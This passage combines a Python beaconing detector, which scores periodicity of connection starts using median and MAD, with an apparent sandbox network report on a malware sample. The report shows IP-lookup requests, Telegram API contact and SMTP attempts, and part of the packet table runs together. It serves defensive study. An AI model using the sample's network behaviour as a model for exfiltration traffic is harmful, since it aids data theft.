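    return base.replace(tzinfo=timezone.utc).timestamp() + int(frac) / 10 ** len(frac)


def parse_row(line: str):
    ts, sport, dport, src, dst = re.split(r"\s{2,}", line.strip())
    return parse_timestamp(ts), int(sport), int(dport), src, dst


def connection_starts(rows):
    """Map (server ip, server port) -> sorted flow start times. A flow is the
    unordered endpoint pair; its earliest packet names client (src) and server
    (dst), so server->client packets never create a phantom second flow."""
    first = {}
    for ts, sport, dport, src, dst in rows:
        key = frozenset([(src, sport), (dst, dport)])
        if key not in first or ts < first[key][0]:
            first[key] = (ts, dst, dport)
    by_server = defaultdict(list)
    for ts, dst, dport in first.values():
        by_server[(dst, dport)].append(ts)
    return {server: sorted(times) for server, times in by_server.items()}


def periodicity(starts, min_connections=4, max_mad_ratio=0.2):
    """Score the gaps between successive connection starts. None when there are
    too few connections to judge; otherwise median gap, MAD/median and verdict."""
    if len(starts) < min_connections:
        return None
    gaps = [b - a for a, b in zip(starts, starts[1:])]
    median_gap = statistics.median(gaps)
    mad = statistics.median(abs(g - median_gap) for g in gaps)
    ratio = mad / median_gap if median_gap > 0 else float("inf")
    return {"connections": len(starts), "median_gap": median_gap,
            "mad_ratio": ratio, "periodic": ratio <= max_mad_ratio}


def analyse(lines):
    """Full pipeline: text rows -> flows -> per-server periodicity scores."""
    starts = connection_starts(parse_row(line) for line in lines)
    return {server: periodicity(times) for server, times in starts.items()}


if __name__ == "__main__":
    for (ip, port), score in sorted(analyse(SAMPLE_ROWS).items()):
        print(f"{ip}:{port}", score)
```

On these rows both endpoints come out with six connections about 1.15 to 1.19 s apart and a MAD/median ratio well under 0.05. The first HTTP gap is 3.25 s because the server took roughly 1.6 s to answer the first request (request at 15:32:08.78, response data at 15:32:10.42 in the listing); a mean-and-standard-deviation check would be dragged by that single outlier, which is why the score uses median and MAD. The thresholds are starting points to tune against your own traffic, not values the report provides.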
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 7, 2024 15:32:08.776802063 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:08.781671047 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:08.781765938 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:08.782037973 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:08.786951065 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.419218063 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.419576883 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.419810057 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.419852018 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:10.419852018 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:10.420491934 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.420532942 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:10.423350096 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:10.428246021 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.573785067 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:10.619436979 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:10.619488955 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:10.619498968 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:10.619549990 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:10.627645969 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:10.627657890 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.082218885 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.082315922 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.087321997 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.087333918 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.087641954 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.135417938 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.141650915 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.187402964 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.246562958 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.246803999 CEST  443          49700      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.246869087 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.252212048 CEST  49700        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.255348921 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:11.260171890 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:11.417453051 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:11.420046091 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.420084000 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.420161009 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.420392990 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.420402050 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.463421106 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:11.866590977 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:11.868824005 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:11.868854046 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:12.024559021 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:12.024646997 CEST  443          49701      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:12.024694920 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:12.025141001 CEST  49701        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:12.029836893 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:12.031086922 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:12.035223961 CEST  80           49699      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:12.035294056 CEST  49699        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:12.036786079 CEST  80           49702      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:12.036848068 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:12.036933899 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:12.041737080 CEST  80           49702      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:12.585233927 CEST  80           49702      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:12.586659908 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:12.586703062 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:12.586790085 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:12.587099075 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:12.587114096 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:12.635104895 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.047451973 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.049753904 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.049803972 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.178781986 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.179016113 CEST  443          49703      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.179097891 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.179620981 CEST  49703        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.183911085 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.185630083 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.189121008 CEST  80           49702      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:13.189197063 CEST  49702        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.190442085 CEST  80           49704      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:13.190542936 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.190700054 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:13.195458889 CEST  80           49704      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:13.739020109 CEST  80           49704      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:13.740792036 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.740834951 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.741013050 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.741296053 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:13.741316080 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:13.791372061 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.191041946 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.192961931 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.192996979 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.325818062 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.326076031 CEST  443          49705      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.326128006 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.326581001 CEST  49705        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.329606056 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.330506086 CEST  49706        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.336381912 CEST  80           49706      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:14.336466074 CEST  49706        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.336594105 CEST  49706        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.336987019 CEST  80           49704      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:14.337212086 CEST  49704        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:14.342717886 CEST  80           49706      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:14.895538092 CEST  80           49706      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:14.897156954 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.897217989 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.897296906 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.901082039 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:14.901118994 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:14.947633982 CEST  49706        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:15.364062071 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:15.365806103 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:15.365828037 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:15.878349066 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:15.878590107 CEST  443          49707      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:15.878648043 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:15.879211903 CEST  49707        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:15.897013903 CEST  49708        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:15.902157068 CEST  80           49708      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:15.902247906 CEST  49708        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:15.903928041 CEST  49708        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:15.908772945 CEST  80           49708      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:16.472619057 CEST  80           49708      158.101.44.242   192.168.2.7
Oct 7, 2024 15:32:16.485485077 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:16.485543013 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:16.485733986 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:16.485965967 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:16.485986948 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:16.525775909 CEST  49708        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:16.938893080 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:16.940721035 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:16.940809965 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:17.084922075 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:17.085138083 CEST  443          49709      188.114.97.3     192.168.2.7
Oct 7, 2024 15:32:17.085191011 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:17.085587978 CEST  49709        443        192.168.2.7      188.114.97.3
Oct 7, 2024 15:32:17.089426994 CEST  49708        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:17.090563059 CEST  49710        80         192.168.2.7      158.101.44.242
Oct 7, 2024 15:32:17.094785929 CEST  80           49708      158.101.44.242   192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.094918013 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.095470905 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.095524073 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.095774889 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.100573063 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.632886887 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.633948088 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.633977890 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.634037971 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.634282112 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.634289026 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.681993961 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.106833935 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.108937979 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.108958960 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238713026 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238805056 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238873959 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.239360094 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.242965937 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.244038105 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.248245955 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.248305082 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.248893976 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.248966932 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.249037027 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.254184008 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.017308950 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.018198013 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.018261909 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.020211935 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020257950 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.020337105 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020551920 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020566940 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.512697935 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.514173031 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.514195919 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662012100 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662122965 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662198067 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.662635088 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.665285110 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.666277885 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.670768023 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.670835972 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.671494961 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.671560049 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.671669960 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.676603079 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.217713118 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.218930006 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.218969107 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.219041109 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.219394922 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.219405890 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.260134935 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.671840906 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.680212975 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.680227995 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819034100 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819124937 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819209099 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.825172901 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.918596029 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.924390078 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.924443007 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.931436062 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.931473017 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.931534052 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.934407949 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.934422016 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.891280890 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.891357899 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.892986059 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.892991066 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.893220901 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.894597054 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.939413071 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.131922007 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.131982088 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.132059097 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:23.136456013 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:28.311276913 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:28.586433887 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:29.572762012 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:31.573045015 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:35.572705030 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:43.572726011 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:51.091054916 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:52.104017019 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:54.104020119 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:58.104027987 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:33:06.104062080 CEST4990325192.168.2.7192.250.231.25
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 15:32:08.759109020 CEST | 50178 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 15:32:08.766763926 CEST | 53 | 50178 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 15:32:10.608319998 CEST | 54286 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 15:32:10.618717909 CEST | 53 | 54286 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 15:32:21.918437004 CEST | 63606 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 15:32:21.925395012 CEST | 53 | 63606 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 15:32:28.489160061 CEST | 65353 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 15:32:28.585696936 CEST | 53 | 65353 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 15:32:53.814888000 CEST | 53 | 63920 | 162.159.36.2 | 192.168.2.7
Oct 7, 2024 15:32:54.524446964 CEST | 53 | 52524 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 15:32:08.759109020 CEST | 192.168.2.7 | 1.1.1.1 | 0x599 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:10.608319998 CEST | 192.168.2.7 | 1.1.1.1 | 0x6a1a | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:21.918437004 CEST | 192.168.2.7 | 1.1.1.1 | 0xcfae | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:28.489160061 CEST | 192.168.2.7 | 1.1.1.1 | 0xd10d | Standard query (0) | mail.electradubai.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:08.766763926 CEST | 1.1.1.1 | 192.168.2.7 | 0x599 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:10.618717909 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a1a | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:10.618717909 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a1a | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:21.925395012 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfae | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 15:32:28.585696936 CEST | 1.1.1.1 | 192.168.2.7 | 0xd10d | No error (0) | mail.electradubai.com | - | 192.250.231.25 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:32:08.782037973 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 7, 2024 15:32:10.419218063 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f68e09b5ca41aa72a69189561720b207
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 15:32:10.419576883 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f68e09b5ca41aa72a69189561720b207
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 15:32:10.419810057 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f68e09b5ca41aa72a69189561720b207
